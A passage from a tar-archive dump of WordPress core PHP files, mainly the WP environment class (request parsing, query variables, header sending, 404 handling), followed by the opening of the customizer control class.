$next = '<!--nextpage-->';
// Check for paged content that exceeds the max number of pages.
if ( $post && ! empty( $this->query_vars['page'] ) ) {
// Check if content is actually intended to be paged.
if ( str_contains( $post->post_content, $next ) ) {
$page = trim( $this->query_vars['page'], '/' );
$content_found = (int) $page <= ( substr_count( $post->post_content, $next ) + 1 );
} else {
$content_found = false;
}
}
}
// The posts page does not support the <!--nextpage--> pagination.
if ( $wp_query->is_posts_page && ! empty( $this->query_vars['page'] ) ) {
$content_found = false;
}
if ( $content_found ) {
$set_404 = false;
}
// We will 404 for paged queries, as no posts were found.
} elseif ( ! is_paged() ) {
$author = get_query_var( 'author' );
// Don't 404 for authors without posts as long as they matched an author on this site.
if ( is_author() && is_numeric( $author ) && $author > 0 && is_user_member_of_blog( $author )
// Don't 404 for these queries if they matched an object.
|| ( is_tag() || is_category() || is_tax() || is_post_type_archive() ) && get_queried_object()
// Don't 404 for these queries either.
|| is_home() || is_search() || is_feed()
) {
$set_404 = false;
}
}
if ( $set_404 ) {
// Guess it's time to 404.
$wp_query->set_404();
status_header( 404 );
nocache_headers();
} else {
status_header( 200 );
}
}
/**
* Sets up all of the variables required by the WordPress environment.
*
* The action {@see 'wp'} has one parameter that references the WP object. It
* allows for accessing the properties and methods to further manipulate the
* object.
*
* @since 2.0.0
*
* @param string|array $query_args Passed to parse_request().
*/
public function main( $query_args = '' ) {
$this->init();
$parsed = $this->parse_request( $query_args );
if ( $parsed ) {
$this->query_posts();
$this->handle_404();
$this->register_globals();
}
$this->send_headers();
/**
* Fires once the WordPress environment has been set up.
*
* @since 2.1.0
*
* @param WP $wp Current WordPress environment instance (passed by reference).
*/
do_action_ref_array( 'wp', array( &$this ) );
}
}
class-wp.php 0000666 00000063561 15224151220 0007017 0 ustar 00 <?php
/**
* WordPress environment setup class.
*
* @package WordPress
* @since 2.0.0
*/
#[AllowDynamicProperties]
class WP {
/**
* Public query variables.
*
* Long list of public query variables.
*
* @since 2.0.0
* @var string[]
*/
public $public_query_vars = array( 'm', 'p', 'posts', 'w', 'cat', 'withcomments', 'withoutcomments', 's', 'search', 'exact', 'sentence', 'calendar', 'page', 'paged', 'more', 'tb', 'pb', 'author', 'order', 'orderby', 'year', 'monthnum', 'day', 'hour', 'minute', 'second', 'name', 'category_name', 'tag', 'feed', 'author_name', 'pagename', 'page_id', 'error', 'attachment', 'attachment_id', 'subpost', 'subpost_id', 'preview', 'robots', 'favicon', 'taxonomy', 'term', 'cpage', 'post_type', 'embed' );
/**
* Private query variables.
*
* Long list of private query variables.
*
* @since 2.0.0
* @var string[]
*/
public $private_query_vars = array( 'offset', 'posts_per_page', 'posts_per_archive_page', 'showposts', 'nopaging', 'post_type', 'post_status', 'category__in', 'category__not_in', 'category__and', 'tag__in', 'tag__not_in', 'tag__and', 'tag_slug__in', 'tag_slug__and', 'tag_id', 'post_mime_type', 'perm', 'comments_per_page', 'post__in', 'post__not_in', 'post_parent', 'post_parent__in', 'post_parent__not_in', 'title', 'fields' );
/**
* Extra query variables set by the user.
*
* @since 2.1.0
* @var array
*/
public $extra_query_vars = array();
/**
* Query variables for setting up the WordPress Query Loop.
*
* @since 2.0.0
* @var array
*/
public $query_vars = array();
/**
* String parsed to set the query variables.
*
* @since 2.0.0
* @var string
*/
public $query_string = '';
/**
* The request path, e.g. 2015/05/06.
*
* @since 2.0.0
* @var string
*/
public $request = '';
/**
* Rewrite rule the request matched.
*
* @since 2.0.0
* @var string
*/
public $matched_rule = '';
/**
* Rewrite query the request matched.
*
* @since 2.0.0
* @var string
*/
public $matched_query = '';
/**
* Whether already did the permalink.
*
* @since 2.0.0
* @var bool
*/
public $did_permalink = false;
/**
* Adds a query variable to the list of public query variables.
*
* @since 2.1.0
*
* @param string $qv Query variable name.
*/
public function add_query_var( $qv ) {
if ( ! in_array( $qv, $this->public_query_vars, true ) ) {
$this->public_query_vars[] = $qv;
}
}
/**
* Removes a query variable from a list of public query variables.
*
* @since 4.5.0
*
* @param string $name Query variable name.
*/
public function remove_query_var( $name ) {
$this->public_query_vars = array_diff( $this->public_query_vars, array( $name ) );
}
/**
* Sets the value of a query variable.
*
* @since 2.3.0
*
* @param string $key Query variable name.
* @param mixed $value Query variable value.
*/
public function set_query_var( $key, $value ) {
$this->query_vars[ $key ] = $value;
}
/**
* Parses the request to find the correct WordPress query.
*
* Sets up the query variables based on the request. There are also many
* filters and actions that can be used to further manipulate the result.
*
* @since 2.0.0
* @since 6.0.0 A return value was added.
*
* @global WP_Rewrite $wp_rewrite WordPress rewrite component.
*
* @param array|string $extra_query_vars Set the extra query variables.
* @return bool Whether the request was parsed.
*/
public function parse_request( $extra_query_vars = '' ) {
global $wp_rewrite;
/**
* Filters whether to parse the request.
*
* @since 3.5.0
*
* @param bool $bool Whether or not to parse the request. Default true.
* @param WP $wp Current WordPress environment instance.
* @param array|string $extra_query_vars Extra passed query variables.
*/
if ( ! apply_filters( 'do_parse_request', true, $this, $extra_query_vars ) ) {
return false;
}
$this->query_vars = array();
$post_type_query_vars = array();
if ( is_array( $extra_query_vars ) ) {
$this->extra_query_vars = & $extra_query_vars;
} elseif ( ! empty( $extra_query_vars ) ) {
parse_str( $extra_query_vars, $this->extra_query_vars );
}
// Process PATH_INFO, REQUEST_URI, and 404 for permalinks.
// Fetch the rewrite rules.
$rewrite = $wp_rewrite->wp_rewrite_rules();
if ( ! empty( $rewrite ) ) {
// If we match a rewrite rule, this will be cleared.
$error = '404';
$this->did_permalink = true;
$pathinfo = isset( $_SERVER['PATH_INFO'] ) ? $_SERVER['PATH_INFO'] : '';
list( $pathinfo ) = explode( '?', $pathinfo );
$pathinfo = str_replace( '%', '%25', $pathinfo );
list( $req_uri ) = explode( '?', $_SERVER['REQUEST_URI'] );
$self = $_SERVER['PHP_SELF'];
$home_path = parse_url( home_url(), PHP_URL_PATH );
$home_path_regex = '';
if ( is_string( $home_path ) && '' !== $home_path ) {
$home_path = trim( $home_path, '/' );
$home_path_regex = sprintf( '|^%s|i', preg_quote( $home_path, '|' ) );
}
/*
* Trim path info from the end and the leading home path from the front.
* For path info requests, this leaves us with the requesting filename, if any.
* For 404 requests, this leaves us with the requested permalink.
*/
$req_uri = str_replace( $pathinfo, '', $req_uri );
$req_uri = trim( $req_uri, '/' );
$pathinfo = trim( $pathinfo, '/' );
$self = trim( $self, '/' );
if ( ! empty( $home_path_regex ) ) {
$req_uri = preg_replace( $home_path_regex, '', $req_uri );
$req_uri = trim( $req_uri, '/' );
$pathinfo = preg_replace( $home_path_regex, '', $pathinfo );
$pathinfo = trim( $pathinfo, '/' );
$self = preg_replace( $home_path_regex, '', $self );
$self = trim( $self, '/' );
}
// The requested permalink is in $pathinfo for path info requests and $req_uri for other requests.
if ( ! empty( $pathinfo ) && ! preg_match( '|^.*' . $wp_rewrite->index . '$|', $pathinfo ) ) {
$requested_path = $pathinfo;
} else {
// If the request uri is the index, blank it out so that we don't try to match it against a rule.
if ( $req_uri === $wp_rewrite->index ) {
$req_uri = '';
}
$requested_path = $req_uri;
}
$requested_file = $req_uri;
$this->request = $requested_path;
// Look for matches.
$request_match = $requested_path;
if ( empty( $request_match ) ) {
// An empty request could only match against ^$ regex.
if ( isset( $rewrite['$'] ) ) {
$this->matched_rule = '$';
$query = $rewrite['$'];
$matches = array( '' );
}
} else {
foreach ( (array) $rewrite as $match => $query ) {
// If the requested file is the anchor of the match, prepend it to the path info.
if ( ! empty( $requested_file )
&& str_starts_with( $match, $requested_file )
&& $requested_file !== $requested_path
) {
$request_match = $requested_file . '/' . $requested_path;
}
if ( preg_match( "#^$match#", $request_match, $matches )
|| preg_match( "#^$match#", urldecode( $request_match ), $matches )
) {
if ( $wp_rewrite->use_verbose_page_rules
&& preg_match( '/pagename=\$matches\[([0-9]+)\]/', $query, $varmatch )
) {
// This is a verbose page match, let's check to be sure about it.
$page = get_page_by_path( $matches[ $varmatch[1] ] );
if ( ! $page ) {
continue;
}
$post_status_obj = get_post_status_object( $page->post_status );
if ( ! $post_status_obj->public && ! $post_status_obj->protected
&& ! $post_status_obj->private && $post_status_obj->exclude_from_search
) {
continue;
}
}
// Got a match.
$this->matched_rule = $match;
break;
}
}
}
if ( ! empty( $this->matched_rule ) ) {
// Trim the query of everything up to the '?'.
$query = preg_replace( '!^.+\?!', '', $query );
// Substitute the substring matches into the query.
$query = addslashes( WP_MatchesMapRegex::apply( $query, $matches ) );
$this->matched_query = $query;
// Parse the query.
parse_str( $query, $perma_query_vars );
// If we're processing a 404 request, clear the error var since we found something.
if ( '404' === $error ) {
unset( $error, $_GET['error'] );
}
}
// If req_uri is empty or if it is a request for ourself, unset error.
if ( empty( $requested_path ) || $requested_file === $self
|| str_contains( $_SERVER['PHP_SELF'], 'wp-admin/' )
) {
unset( $error, $_GET['error'] );
if ( isset( $perma_query_vars ) && str_contains( $_SERVER['PHP_SELF'], 'wp-admin/' ) ) {
unset( $perma_query_vars );
}
$this->did_permalink = false;
}
}
/**
* Filters the query variables allowed before processing.
*
* Allows (publicly allowed) query vars to be added, removed, or changed prior
* to executing the query. Needed to allow custom rewrite rules using your own arguments
* to work, or any other custom query variables you want to be publicly available.
*
* @since 1.5.0
*
* @param string[] $public_query_vars The array of allowed query variable names.
*/
$this->public_query_vars = apply_filters( 'query_vars', $this->public_query_vars );
foreach ( get_post_types( array(), 'objects' ) as $post_type => $t ) {
if ( is_post_type_viewable( $t ) && $t->query_var ) {
$post_type_query_vars[ $t->query_var ] = $post_type;
}
}
foreach ( $this->public_query_vars as $wpvar ) {
if ( isset( $this->extra_query_vars[ $wpvar ] ) ) {
$this->query_vars[ $wpvar ] = $this->extra_query_vars[ $wpvar ];
} elseif ( isset( $_GET[ $wpvar ] ) && isset( $_POST[ $wpvar ] )
&& $_GET[ $wpvar ] !== $_POST[ $wpvar ]
) {
wp_die(
__( 'A variable mismatch has been detected.' ),
__( 'Sorry, you are not allowed to view this item.' ),
400
);
} elseif ( isset( $_POST[ $wpvar ] ) ) {
$this->query_vars[ $wpvar ] = $_POST[ $wpvar ];
} elseif ( isset( $_GET[ $wpvar ] ) ) {
$this->query_vars[ $wpvar ] = $_GET[ $wpvar ];
} elseif ( isset( $perma_query_vars[ $wpvar ] ) ) {
$this->query_vars[ $wpvar ] = $perma_query_vars[ $wpvar ];
}
if ( ! empty( $this->query_vars[ $wpvar ] ) ) {
if ( ! is_array( $this->query_vars[ $wpvar ] ) ) {
$this->query_vars[ $wpvar ] = (string) $this->query_vars[ $wpvar ];
} else {
foreach ( $this->query_vars[ $wpvar ] as $vkey => $v ) {
if ( is_scalar( $v ) ) {
$this->query_vars[ $wpvar ][ $vkey ] = (string) $v;
}
}
}
if ( isset( $post_type_query_vars[ $wpvar ] ) ) {
$this->query_vars['post_type'] = $post_type_query_vars[ $wpvar ];
$this->query_vars['name'] = $this->query_vars[ $wpvar ];
}
}
}
// Convert urldecoded spaces back into '+'.
foreach ( get_taxonomies( array(), 'objects' ) as $taxonomy => $t ) {
if ( $t->query_var && isset( $this->query_vars[ $t->query_var ] ) ) {
$this->query_vars[ $t->query_var ] = str_replace( ' ', '+', $this->query_vars[ $t->query_var ] );
}
}
// Don't allow non-publicly queryable taxonomies to be queried from the front end.
if ( ! is_admin() ) {
foreach ( get_taxonomies( array( 'publicly_queryable' => false ), 'objects' ) as $taxonomy => $t ) {
/*
* Disallow when set to the 'taxonomy' query var.
* Non-publicly queryable taxonomies cannot register custom query vars. See register_taxonomy().
*/
if ( isset( $this->query_vars['taxonomy'] ) && $taxonomy === $this->query_vars['taxonomy'] ) {
unset( $this->query_vars['taxonomy'], $this->query_vars['term'] );
}
}
}
// Limit publicly queried post_types to those that are 'publicly_queryable'.
if ( isset( $this->query_vars['post_type'] ) ) {
$queryable_post_types = get_post_types( array( 'publicly_queryable' => true ) );
if ( ! is_array( $this->query_vars['post_type'] ) ) {
if ( ! in_array( $this->query_vars['post_type'], $queryable_post_types, true ) ) {
unset( $this->query_vars['post_type'] );
}
} else {
$this->query_vars['post_type'] = array_intersect( $this->query_vars['post_type'], $queryable_post_types );
}
}
// Resolve conflicts between posts with numeric slugs and date archive queries.
$this->query_vars = wp_resolve_numeric_slug_conflicts( $this->query_vars );
foreach ( (array) $this->private_query_vars as $var ) {
if ( isset( $this->extra_query_vars[ $var ] ) ) {
$this->query_vars[ $var ] = $this->extra_query_vars[ $var ];
}
}
if ( isset( $error ) ) {
$this->query_vars['error'] = $error;
}
/**
* Filters the array of parsed query variables.
*
* @since 2.1.0
*
* @param array $query_vars The array of requested query variables.
*/
$this->query_vars = apply_filters( 'request', $this->query_vars );
/**
* Fires once all query variables for the current request have been parsed.
*
* @since 2.1.0
*
* @param WP $wp Current WordPress environment instance (passed by reference).
*/
do_action_ref_array( 'parse_request', array( &$this ) );
return true;
}
/**
* Sends additional HTTP headers for caching, content type, etc.
*
* Sets the Content-Type header. Sets the 'error' status (if passed) and optionally exits.
* If showing a feed, it will also send Last-Modified, ETag, and 304 status if needed.
*
* @since 2.0.0
* @since 4.4.0 `X-Pingback` header is added conditionally for single posts that allow pings.
* @since 6.1.0 Runs after posts have been queried.
*
* @global WP_Query $wp_query WordPress Query object.
*/
public function send_headers() {
global $wp_query;
$headers = array();
$status = null;
$exit_required = false;
$date_format = 'D, d M Y H:i:s';
if ( is_user_logged_in() ) {
$headers = array_merge( $headers, wp_get_nocache_headers() );
} elseif ( ! empty( $_GET['unapproved'] ) && ! empty( $_GET['moderation-hash'] ) ) {
// Unmoderated comments are only visible for 10 minutes via the moderation hash.
$expires = 10 * MINUTE_IN_SECONDS;
$headers['Expires'] = gmdate( $date_format, time() + $expires );
$headers['Cache-Control'] = sprintf(
'max-age=%d, must-revalidate',
$expires
);
}
if ( ! empty( $this->query_vars['error'] ) ) {
$status = (int) $this->query_vars['error'];
if ( 404 === $status ) {
if ( ! is_user_logged_in() ) {
$headers = array_merge( $headers, wp_get_nocache_headers() );
}
$headers['Content-Type'] = get_option( 'html_type' ) . '; charset=' . get_option( 'blog_charset' );
} elseif ( in_array( $status, array( 403, 500, 502, 503 ), true ) ) {
$exit_required = true;
}
} elseif ( empty( $this->query_vars['feed'] ) ) {
$headers['Content-Type'] = get_option( 'html_type' ) . '; charset=' . get_option( 'blog_charset' );
} else {
// Set the correct content type for feeds.
$type = $this->query_vars['feed'];
if ( 'feed' === $this->query_vars['feed'] ) {
$type = get_default_feed();
}
$headers['Content-Type'] = feed_content_type( $type ) . '; charset=' . get_option( 'blog_charset' );
// We're showing a feed, so WP is indeed the only thing that last changed.
if ( ! empty( $this->query_vars['withcomments'] )
|| str_contains( $this->query_vars['feed'], 'comments-' )
|| ( empty( $this->query_vars['withoutcomments'] )
&& ( ! empty( $this->query_vars['p'] )
|| ! empty( $this->query_vars['name'] )
|| ! empty( $this->query_vars['page_id'] )
|| ! empty( $this->query_vars['pagename'] )
|| ! empty( $this->query_vars['attachment'] )
|| ! empty( $this->query_vars['attachment_id'] )
)
)
) {
$wp_last_modified_post = mysql2date( $date_format, get_lastpostmodified( 'GMT' ), false );
$wp_last_modified_comment = mysql2date( $date_format, get_lastcommentmodified( 'GMT' ), false );
if ( strtotime( $wp_last_modified_post ) > strtotime( $wp_last_modified_comment ) ) {
$wp_last_modified = $wp_last_modified_post;
} else {
$wp_last_modified = $wp_last_modified_comment;
}
} else {
$wp_last_modified = mysql2date( $date_format, get_lastpostmodified( 'GMT' ), false );
}
if ( ! $wp_last_modified ) {
$wp_last_modified = gmdate( $date_format );
}
$wp_last_modified .= ' GMT';
$wp_etag = '"' . md5( $wp_last_modified ) . '"';
$headers['Last-Modified'] = $wp_last_modified;
$headers['ETag'] = $wp_etag;
// Support for conditional GET.
if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) ) {
$client_etag = wp_unslash( $_SERVER['HTTP_IF_NONE_MATCH'] );
} else {
$client_etag = '';
}
if ( isset( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ) ) {
$client_last_modified = trim( $_SERVER['HTTP_IF_MODIFIED_SINCE'] );
} else {
$client_last_modified = '';
}
// If string is empty, return 0. If not, attempt to parse into a timestamp.
$client_modified_timestamp = $client_last_modified ? strtotime( $client_last_modified ) : 0;
// Make a timestamp for our most recent modification.
$wp_modified_timestamp = strtotime( $wp_last_modified );
if ( ( $client_last_modified && $client_etag )
? ( ( $client_modified_timestamp >= $wp_modified_timestamp ) && ( $client_etag === $wp_etag ) )
: ( ( $client_modified_timestamp >= $wp_modified_timestamp ) || ( $client_etag === $wp_etag ) )
) {
$status = 304;
$exit_required = true;
}
}
if ( is_singular() ) {
$post = isset( $wp_query->post ) ? $wp_query->post : null;
// Only set X-Pingback for single posts that allow pings.
if ( $post && pings_open( $post ) ) {
$headers['X-Pingback'] = get_bloginfo( 'pingback_url', 'display' );
}
// Send nocache headers for password protected posts to avoid unwanted caching.
if ( ! empty( $post->post_password ) ) {
$headers = array_merge( $headers, wp_get_nocache_headers() );
}
}
/**
* Filters the HTTP headers before they're sent to the browser.
*
* @since 2.8.0
*
* @param string[] $headers Associative array of headers to be sent.
* @param WP $wp Current WordPress environment instance.
*/
$headers = apply_filters( 'wp_headers', $headers, $this );
if ( ! empty( $status ) ) {
status_header( $status );
}
// If Last-Modified is set to false, it should not be sent (no-cache situation).
if ( isset( $headers['Last-Modified'] ) && false === $headers['Last-Modified'] ) {
unset( $headers['Last-Modified'] );
if ( ! headers_sent() ) {
header_remove( 'Last-Modified' );
}
}
if ( ! headers_sent() ) {
foreach ( (array) $headers as $name => $field_value ) {
header( "{$name}: {$field_value}" );
}
}
if ( $exit_required ) {
exit;
}
/**
* Fires once the requested HTTP headers for caching, content type, etc. have been sent.
*
* The {@see 'wp_finalized_template_enhancement_output_buffer'} action may be used to send
* headers after rendering the template into an output buffer.
*
* @since 2.1.0
*
* @param WP $wp Current WordPress environment instance (passed by reference).
*/
do_action_ref_array( 'send_headers', array( &$this ) );
}
/**
* Sets the query string property based off of the query variable property.
*
* The {@see 'query_string'} filter is deprecated, but still works. Plugins should
* use the {@see 'request'} filter instead.
*
* @since 2.0.0
*/
public function build_query_string() {
$this->query_string = '';
foreach ( (array) array_keys( $this->query_vars ) as $wpvar ) {
if ( '' !== $this->query_vars[ $wpvar ] ) {
$this->query_string .= ( strlen( $this->query_string ) < 1 ) ? '' : '&';
if ( ! is_scalar( $this->query_vars[ $wpvar ] ) ) { // Discard non-scalars.
continue;
}
$this->query_string .= $wpvar . '=' . rawurlencode( $this->query_vars[ $wpvar ] );
}
}
if ( has_filter( 'query_string' ) ) { // Don't bother filtering and parsing if no plugins are hooked in.
/**
* Filters the query string before parsing.
*
* @since 1.5.0
* @deprecated 2.1.0 Use {@see 'query_vars'} or {@see 'request'} filters instead.
*
* @param string $query_string The query string to modify.
*/
$this->query_string = apply_filters_deprecated(
'query_string',
array( $this->query_string ),
'2.1.0',
'query_vars, request'
);
parse_str( $this->query_string, $this->query_vars );
}
}
/**
* Set up the WordPress Globals.
*
* The query_vars property will be extracted to the GLOBALS. So care should
* be taken when naming global variables that might interfere with the
* WordPress environment.
*
* @since 2.0.0
*
* @global WP_Query $wp_query WordPress Query object.
* @global string $query_string Query string for the loop.
* @global array $posts The found posts.
* @global WP_Post|null $post The current post, if available.
* @global string $request The SQL statement for the request.
* @global int $more Only set, if single page or post.
* @global int $single If single page or post. Only set, if single page or post.
* @global WP_User $authordata Only set, if author archive.
*/
public function register_globals() {
global $wp_query;
// Extract updated query vars back into global namespace.
foreach ( (array) $wp_query->query_vars as $key => $value ) {
$GLOBALS[ $key ] = $value;
}
$GLOBALS['query_string'] = $this->query_string;
$GLOBALS['posts'] = & $wp_query->posts;
$GLOBALS['post'] = isset( $wp_query->post ) ? $wp_query->post : null;
$GLOBALS['request'] = $wp_query->request;
if ( $wp_query->is_single() || $wp_query->is_page() ) {
$GLOBALS['more'] = 1;
$GLOBALS['single'] = 1;
}
if ( $wp_query->is_author() ) {
$GLOBALS['authordata'] = get_userdata( get_queried_object_id() );
}
}
/**
* Set up the current user.
*
* @since 2.0.0
*/
public function init() {
wp_get_current_user();
}
/**
* Set up the Loop based on the query variables.
*
* @since 2.0.0
*
* @global WP_Query $wp_the_query WordPress Query object.
*/
public function query_posts() {
global $wp_the_query;
$this->build_query_string();
$wp_the_query->query( $this->query_vars );
}
/**
* Set the Headers for 404, if nothing is found for requested URL.
*
* Issue a 404 if a request doesn't match any posts and doesn't match any object
* (e.g. an existing-but-empty category, tag, author) and a 404 was not already issued,
* and if the request was not a search or the homepage.
*
* Otherwise, issue a 200.
*
* This sets headers after posts have been queried. handle_404() really means "handle status".
* By inspecting the result of querying posts, seemingly successful requests can be switched to
* a 404 so that canonical redirection logic can kick in.
*
* @since 2.0.0
*
* @global WP_Query $wp_query WordPress Query object.
*/
public function handle_404() {
global $wp_query;
/**
* Filters whether to short-circuit default header status handling.
*
* Returning a non-false value from the filter will short-circuit the handling
* and return early.
*
* @since 4.5.0
*
* @param bool $preempt Whether to short-circuit default header status handling. Default false.
* @param WP_Query $wp_query WordPress Query object.
*/
if ( false !== apply_filters( 'pre_handle_404', false, $wp_query ) ) {
return;
}
// If we've already issued a 404, bail.
if ( is_404() ) {
return;
}
$set_404 = true;
// Never 404 for the admin, robots, or favicon.
if ( is_admin() || is_robots() || is_favicon() ) {
$set_404 = false;
// If posts were found, check for paged content.
} elseif ( $wp_query->posts ) {
$content_found = true;
if ( is_singular() ) {
$post = isset( $wp_query->post ) ? $wp_query->post : null;
$next = '<!--nextpage-->';
// Check for paged content that exceeds the max number of pages.
if ( $post && ! empty( $this->query_vars['page'] ) ) {
// Check if content is actually intended to be paged.
if ( str_contains( $post->post_content, $next ) ) {
$page = trim( $this->query_vars['page'], '/' );
$content_found = (int) $page <= ( substr_count( $post->post_content, $next ) + 1 );
} else {
$content_found = false;
}
}
}
// The posts page does not support the <!--nextpage--> pagination.
if ( $wp_query->is_posts_page && ! empty( $this->query_vars['page'] ) ) {
$content_found = false;
}
if ( $content_found ) {
$set_404 = false;
}
// We will 404 for paged queries, as no posts were found.
} elseif ( ! is_paged() ) {
$author = get_query_var( 'author' );
// Don't 404 for authors without posts as long as they matched an author on this site.
if ( is_author() && is_numeric( $author ) && $author > 0 && is_user_member_of_blog( $author )
// Don't 404 for these queries if they matched an object.
|| ( is_tag() || is_category() || is_tax() || is_post_type_archive() ) && get_queried_object()
// Don't 404 for these queries either.
|| is_home() || is_search() || is_feed()
) {
$set_404 = false;
}
}
if ( $set_404 ) {
// Guess it's time to 404.
$wp_query->set_404();
status_header( 404 );
nocache_headers();
} else {
status_header( 200 );
}
}
/**
* Sets up all of the variables required by the WordPress environment.
*
* The action {@see 'wp'} has one parameter that references the WP object. It
* allows for accessing the properties and methods to further manipulate the
* object.
*
* @since 2.0.0
*
* @param string|array $query_args Passed to parse_request().
*/
public function main( $query_args = '' ) {
$this->init();
$parsed = $this->parse_request( $query_args );
if ( $parsed ) {
$this->query_posts();
$this->handle_404();
$this->register_globals();
}
$this->send_headers();
/**
* Fires once the WordPress environment has been set up.
*
* @since 2.1.0
*
* @param WP $wp Current WordPress environment instance (passed by reference).
*/
do_action_ref_array( 'wp', array( &$this ) );
}
}
class-wp-customize-control-20260621125524.php 0000666 00000063007 15224151220 0014073 0 ustar 00 <?php
/**
* WordPress Customize Control classes
*
* @package WordPress
* @subpackage Customize
* @since 3.4.0
*/
// Don't load directly.
if ( ! defined( 'ABSPATH' ) ) {
die( '-1' );
}
/**
* Customize Control class.
*
* @since 3.4.0
*/
#[AllowDynamicProperties]
class WP_Customize_Control {
/**
* Incremented with each new class instantiation, then stored in $instance_number.
*
* Used when sorting two instances whose priorities are equal.
*
* @since 4.1.0
* @var int
*/
protected static $instance_count = 0;
/**
* Order in which this instance was created in relation to other instances.
*
* @since 4.1.0
* @var int
*/
public $instance_number;
/**
* Customizer manager.
*
* @since 3.4.0
* @var WP_Customize_Manager
*/
public $manager;
/**
* Control ID.
*
* @since 3.4.0
* @var string
*/
public $id;
/**
* All settings tied to the control.
*
* @since 3.4.0
* @var array
*/
public $settings;
/**
* The primary setting for the control (if there is one).
*
* @since 3.4.0
* @var string|WP_Customize_Setting|null
*/
public $setting = 'default';
/**
* Capability required to use this control.
*
* Normally this is empty and the capability is derived from the capabilities
* of the associated `$settings`.
*
* @since 4.5.0
* @var string
*/
public $capability;
/**
* Order priority to load the control in Customizer.
*
* @since 3.4.0
* @var int
*/
public $priority = 10;
/**
* Section the control belongs to.
*
* @since 3.4.0
* @var string
*/
public $section = '';
/**
* Label for the control.
*
* @since 3.4.0
* @var string
*/
public $label = '';
/**
* Description for the control.
*
* @since 4.0.0
* @var string
*/
public $description = '';
/**
* List of choices for 'radio' or 'select' type controls, where values are the keys, and labels are the values.
*
* @since 3.4.0
* @var array
*/
public $choices = array();
/**
* List of custom input attributes for control output, where attribute names are the keys and values are the values.
*
* Not used for 'checkbox', 'radio', 'select', or 'dropdown-pages' control types.
*
* @since 4.0.0
* @var array
*/
public $input_attrs = array();
/**
* Show UI for adding new content, currently only used for the dropdown-pages control.
*
* @since 4.7.0
* @var bool
*/
public $allow_addition = false;
/**
* @deprecated It is better to just call the json() method
* @since 3.4.0
* @var array
*/
public $json = array();
/**
* Control's Type.
*
* @since 3.4.0
* @var string
*/
public $type = 'text';
/**
* Callback.
*
* @since 4.0.0
*
* @see WP_Customize_Control::active()
*
* @var callable Callback is called with one argument, the instance of
* WP_Customize_Control, and returns bool to indicate whether
* the control is active (such as it relates to the URL
* currently being previewed).
*/
public $active_callback = '';
/**
* Constructor.
*
* Supplied `$args` override class property defaults.
*
* If `$args['settings']` is not defined, use the `$id` as the setting ID.
*
* @since 3.4.0
*
* @param WP_Customize_Manager $manager Customizer bootstrap instance.
* @param string $id Control ID.
* @param array $args {
* Optional. Array of properties for the new Control object. Default empty array.
*
* @type int $instance_number Order in which this instance was created in relation
* to other instances.
* @type WP_Customize_Manager $manager Customizer bootstrap instance.
* @type string $id Control ID.
* @type array $settings All settings tied to the control. If undefined, `$id` will
* be used.
* @type string $setting The primary setting for the control (if there is one).
* Default 'default'.
* @type string $capability Capability required to use this control. Normally this is empty
* and the capability is derived from `$settings`.
* @type int $priority Order priority to load the control. Default 10.
* @type string $section Section the control belongs to. Default empty.
* @type string $label Label for the control. Default empty.
* @type string $description Description for the control. Default empty.
* @type array $choices List of choices for 'radio' or 'select' type controls, where
* values are the keys, and labels are the values.
* Default empty array.
* @type array $input_attrs List of custom input attributes for control output, where
* attribute names are the keys and values are the values. Not
* used for 'checkbox', 'radio', 'select', or 'dropdown-pages'
* control types. Default empty array.
* @type bool $allow_addition Show UI for adding new content, currently only used for the
* dropdown-pages control. Default false.
* @type array $json Deprecated. Use WP_Customize_Control::json() instead.
* @type string $type Control type. Core controls include 'text', 'checkbox',
* 'textarea', 'radio', 'select', and 'dropdown-pages'. Additional
* input types such as 'email', 'url', 'number', 'hidden', and
* 'date' are supported implicitly. Default 'text'.
* @type callable $active_callback Active callback.
* }
*/
public function __construct( $manager, $id, $args = array() ) {
$keys = array_keys( get_object_vars( $this ) );
foreach ( $keys as $key ) {
if ( isset( $args[ $key ] ) ) {
$this->$key = $args[ $key ];
}
}
$this->manager = $manager;
$this->id = $id;
if ( empty( $this->active_callback ) ) {
$this->active_callback = array( $this, 'active_callback' );
}
self::$instance_count += 1;
$this->instance_number = self::$instance_count;
// Process settings.
if ( ! isset( $this->settings ) ) {
$this->settings = $id;
}
$settings = array();
if ( is_array( $this->settings ) ) {
foreach ( $this->settings as $key => $setting ) {
$settings[ $key ] = $this->manager->get_setting( $setting );
}
} elseif ( is_string( $this->settings ) ) {
$this->setting = $this->manager->get_setting( $this->settings );
$settings['default'] = $this->setting;
}
$this->settings = $settings;
}
/**
* Enqueues control related scripts/styles.
*
* @since 3.4.0
*/
public function enqueue() {}
/**
* Checks whether control is active to current Customizer preview.
*
* @since 4.0.0
*
* @return bool Whether the control is active to the current preview.
*/
final public function active() {
$control = $this;
$active = call_user_func( $this->active_callback, $this );
/**
* Filters response of WP_Customize_Control::active().
*
* @since 4.0.0
*
* @param bool $active Whether the Customizer control is active.
* @param WP_Customize_Control $control WP_Customize_Control instance.
*/
$active = apply_filters( 'customize_control_active', $active, $control );
return $active;
}
/**
* Default callback used when invoking WP_Customize_Control::active().
*
* Subclasses can override this with their specific logic, or they may
* provide an 'active_callback' argument to the constructor.
*
* @since 4.0.0
*
* @return true Always true.
*/
public function active_callback() {
return true;
}
/**
* Fetches a setting's value.
* Grabs the main setting by default.
*
* @since 3.4.0
*
* @param string $setting_key
* @return mixed The requested setting's value, if the setting exists.
*/
final public function value( $setting_key = 'default' ) {
if ( isset( $this->settings[ $setting_key ] ) ) {
return $this->settings[ $setting_key ]->value();
}
}
/**
* Refreshes the parameters passed to the JavaScript via JSON.
*
* @since 3.4.0
*/
public function to_json() {
$this->json['settings'] = array();
foreach ( $this->settings as $key => $setting ) {
$this->json['settings'][ $key ] = $setting->id;
}
$this->json['type'] = $this->type;
$this->json['priority'] = $this->priority;
$this->json['active'] = $this->active();
$this->json['section'] = $this->section;
$this->json['content'] = $this->get_content();
$this->json['label'] = $this->label;
$this->json['description'] = $this->description;
$this->json['instanceNumber'] = $this->instance_number;
if ( 'dropdown-pages' === $this->type ) {
$this->json['allow_addition'] = $this->allow_addition;
}
}
/**
* Gets the data to export to the client via JSON.
*
* @since 4.1.0
*
* @return array Array of parameters passed to the JavaScript.
*/
public function json() {
$this->to_json();
return $this->json;
}
/**
* Checks if the user can use this control.
*
* Returns false if the user cannot manipulate one of the associated settings,
* or if one of the associated settings does not exist. Also returns false if
* the associated section does not exist or if its capability check returns
* false.
*
* @since 3.4.0
*
* @return bool False if theme doesn't support the control or user doesn't have the required permissions, otherwise true.
